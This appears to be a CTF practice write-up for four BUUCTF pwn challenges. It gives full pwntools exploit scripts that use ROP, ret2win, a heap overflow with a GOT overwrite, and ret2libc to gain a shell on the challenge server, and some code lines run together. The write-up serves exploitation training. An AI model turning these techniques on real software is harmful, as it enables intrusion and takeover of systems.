PWN-PRACTICE-BUUCTF-12
- cmcc_simplerop
- picoctf_2018_buffer overflow 2
- babyfengshui_33c3_2016
- xdctf2015_pwn200
cmcc_simplerop
静态编译的32位elf,找一个"int 80h"执行系统调用
前提是利用栈溢出读入字符串"/bin/sh\x00",然后找pop给寄存器赋值,最后"int 80h",有execve("/bin/sh",0,0)
from pwn import *
io = remote('node4.buuoj.cn',27587)
#io=process('./cmcc_simplerop')
int_80 = 0x80493e1
pop_eax = 0x80bae06
read_addr = 0x0806CD50
binsh_addr = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850payload = 'a'*(0x1c+4) + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8) + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_80)io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()
picoctf_2018_buffer overflow 2
32位elf的栈溢出,传入合适的参数即可
from pwn import *
#io=process('./PicoCTF_2018_buffer_overflow_2')
io=remote('node4.buuoj.cn',27944)
elf=ELF('./PicoCTF_2018_buffer_overflow_2')
win=elf.sym['win']
io.recvuntil('string: \n')
payload='a'*(0x6c+4)+p32(win)+p32(0x0804866D)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
io.sendline(payload)
io.interactive()
babyfengshui_33c3_2016
参考:babyfengshui_33c3_2016题解
from pwn import *
#io=process("./babyfengshui_33c3_2016")
io=remote("node4.buuoj.cn",26888)
elf=ELF("./babyfengshui_33c3_2016")
libc=ELF("./libc-2.23-16-x32.so")
free_got=elf.got["free"]
print(hex(free_got))
def add(size,name,text_len,text):io.sendlineafter("Action: ","0")io.sendlineafter("size of description: ",str(size))io.sendlineafter("name: ",name)io.sendlineafter("text length: ",str(text_len))io.sendlineafter("text: ",text)
def delete(index):io.sendlineafter("Action: ","1")io.sendlineafter("index: ",str(index))
def show(index):io.sendlineafter("Action: ","2")io.sendlineafter("index: ",str(index))
def change(index,text_len,text):io.sendlineafter("Action: ","3")io.sendlineafter("index: ",str(index))io.sendlineafter("text length: ",str(text_len))io.sendlineafter("text: ",text)#gdb.attach(io)
#pause()add(0x10,"aaaa",0x10,"bbbb") #chunk0
add(0x10,"cccc",0x10,"dddd") #chunk1
add(0x10,"eeee",0x10,"/bin/sh\x00") #chunk2#pause()delete(0)
#add(0x80,"gggg",0x20,"hhhh")#pause()payload="a"*(0x80+4)+p32(0x19)+"d"*0x10+p32(0)+p32(0x89)+p32(free_got)
add(0x80,"gggg",len(payload),payload)#pause()show(1)
io.recvuntil("description: ")
free_addr=u32(io.recv(4))
print(hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]#pause()payload=p32(system)
change(1,len(payload),payload)#pause()delete(2)io.interactive()
xdctf2015_pwn200
栈溢出,ret2libc
from pwn import *
#io=process('./xdctf2015_pwn200')
io=remote('node4.buuoj.cn',25803)
elf=ELF('./xdctf2015_pwn200')
libc=ELF('./libc-2.23-x32.so')
main_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
io.recvuntil('XDCTF2015~!\n')
payload='a'*(0x6c+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
libc_base=write_addr-libc.sym['write']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
io.recvuntil('XDCTF2015~!\n')
payload='a'*(0x6c+4)+p32(system)+p32(main_addr)+p32(binsh)
io.sendline(payload)
io.interactive()